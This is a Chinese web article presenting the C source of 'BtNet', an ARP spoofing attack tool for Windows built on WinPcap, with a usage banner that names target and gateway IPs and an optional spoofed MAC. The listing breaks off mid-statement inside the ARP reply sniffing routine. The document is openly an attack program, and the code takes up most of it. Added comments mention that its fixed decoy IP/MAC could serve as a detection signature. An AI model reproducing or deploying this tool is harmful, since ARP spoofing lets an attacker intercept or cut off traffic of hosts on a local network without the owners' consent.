
基于ARP欺骗的网络攻击程序源码

 2008-11-21 13:34:20 来源:WEB开发网   

再说明一下,以上测试只针对Windows系统;不过对没有配置好的Red Hat也测试成功过。

测试程序(BtNet.exe)说明:

Usage: BtNet -h attackIP -o gateIP [-m spoofedMAC]

-m参数是你要修改的源MAC地址.

为了隐蔽攻击者身份,程序在获取目标主机MAC地址时会伪装成IP:128.128.128.128,MAC:a5-a5-a5-a5-a5-a5,这样可能会得不到目标主机的MAC地址,此时请借助第三方工具来获取MAC地址。(从防御角度看,这组固定的伪装地址本身也可以作为识别该程序ARP流量的检测特征。)

附测试程序代码

#include "packet32.h"
#include "ntddndis.h"
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")
#define ETH_IP 0x0800 // EtherType value for IPv4
#define ETH_ARP 0x0806 // EtherType value for ARP
#define ARP_REQUEST 0x0001 // ARP opcode: request
#define ARP_REPLY 0x0002 // ARP opcode: reply
#define ARP_HARDWARE 0x0001 // ARP hardware type: Ethernet
#define max_num_adapter 10 // number of rows in adapterlist[]
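// Wire-format layouts for the Ethernet and ARP headers that sniff() overlays
// directly on captured frame bytes. They must be byte-packed, so the region
// is bracketed by pack(push,1) ... pack(pop).
#pragma pack(push,1)
// Ethernet II frame header (14 bytes).
typedef struct ethdr
{
    unsigned char eh_dst[6]; // destination Ethernet (MAC) address
    unsigned char eh_src[6]; // source Ethernet (MAC) address
    unsigned short eh_type; // EtherType in network byte order; sniff() compares it with htons(ETH_ARP)
}ETHDR,*PETHDR;
// ARP header for IPv4 over Ethernet (28 bytes on the wire).
// NOTE: arp_spa/arp_tpa are declared unsigned long. That is 4 bytes with the
// Windows compilers this code targets; where unsigned long is 8 bytes the
// struct would no longer match the on-wire layout.
typedef struct arphdr
{
    unsigned short arp_hdr; // hardware type
    unsigned short arp_pro; // protocol type
    unsigned char arp_hln; // hardware address length
    unsigned char arp_pln; // protocol address length
    unsigned short arp_opt; // opcode in network byte order; sniff() compares it with htons(ARP_REPLY)
    unsigned char arp_sha[6]; // sender Ethernet (MAC) address
    unsigned long arp_spa; // sender IP address
    unsigned char arp_tha[6]; // target Ethernet (MAC) address
    unsigned long arp_tpa; // target IP address
}ARPHDR,*PARPHDR;
// One IP address / MAC address pair. sniff() compares .ip with
// htonl(arp->arp_spa), so .ip appears to be kept in host byte order
// (confirm against the code that fills it in).
typedef struct ip_mac
{
    u_long ip;
    unsigned char mac[6];
}IP_MAC,*PIP_MAC;
// Restore the packing that was in effect before push,1. The listing had a
// second "push" here, which left 1-byte packing active for everything after.
#pragma pack(pop)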
// Capture adapter handle; sniff() passes it to every Packet* call.
LPADAPTER lpAdapter;
// Storage for up to max_num_adapter adapter names (filled outside this
// excerpt, presumably during adapter enumeration; confirm).
char adapterlist[max_num_adapter][1024];
// IP/MAC records that sniff() matches against the sender IP of incoming ARP
// replies. Which host each one stands for is not visible here; presumably
// the -h host, the -o gateway and the local machine. TODO confirm in main().
IP_MAC toipandmac;
IP_MAC oipandmac,myipandmac;
// Not referenced in the visible code; presumably these hold the optional
// -m MAC argument and its six parsed two-character byte strings. TODO confirm.
BOOL param6=FALSE;
char *noMACstr;
char noMAC[6][3];
// Not referenced in the visible code.
u_long mytoIP,oIP;
BOOL sendtoOip;
MSG msg;
UINT newtimer;
// Fixed sender IP the tool presents while resolving MAC addresses; the
// article text pairs it with sender MAC a5-a5-a5-a5-a5-a5. Both values are
// hard-coded, so ARP traffic carrying them is a usable detection signature.
char MYIP[20]="128.128.128.128";
// "Already resolved" flag for each record above: sniff() only matches a
// record while its flag is FALSE and returns once all three are set.
BOOL toipandmac_flag=FALSE,myipandmac_flag=FALSE,oipandmac_flag=FALSE;
/*
 * Convert one hexadecimal digit character to its numeric value.
 * Accepts '0'-'9', 'a'-'f' and 'A'-'F'; returns -1 for any other character.
 */
int getint(char c)
{
    if (c >= '0' && c <= '9') {
        return c - '0';
    }
    if (c >= 'a' && c <= 'f') {
        return c - 'a' + 10;
    }
    if (c >= 'A' && c <= 'F') {
        return c - 'A' + 10;
    }
    return -1;
}
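/*
 * Print the program banner and the command-line usage text to stdout.
 * Takes no arguments and returns nothing.
 *
 * The listing had lost the backslash of every "\n" escape and had the last
 * string literal split across two lines, which does not compile; both are
 * restored here. All other message text is unchanged.
 */
void start(void)
{
    printf("BtNet //--an ARP Tool test the Windows Break the Internet\n");
    printf("written by Ruder,10/2003\n");
    printf("Homepage: http://xEyes.cdut.net/ruder/index.htm;\n");
    printf("E-mail: cocoruder@163.com\n");
    printf("\nUsage: BtNet -h attackIP -o gateIP [-m spoofedMAC]\n");
    printf("Example:\n");
    printf("BtNet -h 202.115.138.12 -o 202.115.138.1\n");
    printf("BtNet -h 202.115.138.12 -o 202.115.138.1 -m 00-50-fc-6a--6b--7c\n");
    printf(" Warning: You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n");
}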
DWORD WINAPI sniff(LPVOID)
{
LPPACKET lppackets,lpPacketr;
char recvbuf[1024*250];
ULONG ulbytesreceived,off;
ETHDR *eth;
ARPHDR *arp;
char *buf,*pChar,*base;
char szTemp[20];
struct bpf_hdr *hdr;
if((lppackets=PacketAllocatePacket())==FALSE)
{
printf("PacketAllocatePacket send Error: %dn",GetLastError());
return 0;
}
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
{
printf("Warning: Unable to set the adapter to promiscuous moden");
}
if(PacketSetBuff(lpAdapter,500*1024)==FALSE)
{
printf("PacketSetBuff Error: %dn",GetLastError());
return 0;
}
if(PacketSetReadTimeout(lpAdapter,1)==FALSE)
{
printf("Warning: Unable to set the timeoutn");
}
if((lpPacketr=PacketAllocatePacket())==FALSE)
{
printf("PacketAllocatePacket receive Error: %dn",GetLastError());
return 0;
}
PacketInitPacket(lpPacketr,(char *)recvbuf,sizeof(recvbuf));
while(!kbhit())
{
if(PacketReceivePacket(lpAdapter,lpPacketr,TRUE)==FALSE)
{
return 0;
}
//getdata(lppacketr,option);
ulbytesreceived=lpPacketr->ulBytesReceived;
buf=(char *)lpPacketr->Buffer;
off=0;
while(off{
if(kbhit())
{
return 0;
}
hdr=(struct bpf_hdr *)(buf+off);
off+=hdr->bh_hdrlen;
pChar=(char *)(buf+off);
base=pChar;
off=Packet_WORDALIGN(off+hdr->bh_caplen);
eth=(PETHDR)pChar; //以太头
arp=(PARPHDR)(pChar+sizeof(ETHDR)); //arp头
int i;
if((eth->eh_type==htons(ETH_ARP))&&
(arp->arp_opt==htons(ARP_REPLY)))
{
//if (arp->arp_tpa==htonl(ntohl(inet_addr(MYIP))))
{
if(oipandmac_flag&&myipandmac_flag&&toipandmac_flag)
return 0;
if (((toipandmac.ip==htonl(arp->arp_spa))&&(toipandmac_flag==FALSE))
||((myipandmac.ip==htonl(arp->arp_spa))&&(myipandmac_flag==FALSE))
||((oipandmac.ip==htonl(arp->arp_spa))&&(oipandmac_flag==FALSE)))
{
memset(szTemp,0,sizeof(szTemp));
memcpy(szTemp,&arp->arp_spa,sizeof(arp->arp_spa));
printf("[IP]:");
printf("%s",inet_ntoa(*((struct in_addr *)szTemp)));
pr
